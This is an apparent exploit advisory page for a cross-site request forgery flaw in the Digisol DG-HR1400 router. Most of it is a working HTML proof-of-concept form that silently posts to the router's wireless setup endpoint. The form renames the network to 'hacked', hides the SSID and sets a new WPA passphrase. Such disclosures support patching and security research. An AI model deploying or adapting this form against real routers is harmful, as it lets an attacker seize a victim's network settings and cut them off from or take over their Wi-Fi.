DIGISOL DG-HR1400 Cross Site Request Forgery

2017.02.24
Credit: Indrajith A.N
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

html> Digisol Router CSRF Exploit - Indrajith A.N <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.2.1/form2WlanBasicSetup.cgi" method="POST"> <input type="hidden" name="mode" value="0" /> <input type="hidden" name="apssid" value="hacked" /> <input type="hidden" name="startScanUplinkAp" value="0" /> <input type="hidden" name="domain" value="1" /> <input type="hidden" name="hiddenSSID" value="on" /> <input type="hidden" name="ssid" value="hacked" /> <input type="hidden" name="band" value="10" /> <input type="hidden" name="chan" value="6" /> <input type="hidden" name="chanwid" value="1" /> <input type="hidden" name="txRate" value="0" /> <input type="hidden" name="method&#95;cur" value="6" /> <input type="hidden" name="method" value="6" /> <input type="hidden" name="authType" value="2" /> <input type="hidden" name="length" value="1" /> <input type="hidden" name="format" value="2" /> <input type="hidden" name="defaultTxKeyId" value="1" /> <input type="hidden" name="key1" value="0000000000" /> <input type="hidden" name="pskFormat" value="0" /> <input type="hidden" name="pskValue" value="csrf1234" /> <input type="hidden" name="checkWPS2" value="1" /> <input type="hidden" name="save" value="Apply" /> <input type="hidden" name="basicrates" value="15" /> <input type="hidden" name="operrates" value="4095" /> <input type="hidden" name="submit&#46;htm&#63;wlan&#95;basic&#46;htm" value="Send" /> <input type="submit" value="Submit request" /> </form> </body> </html>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top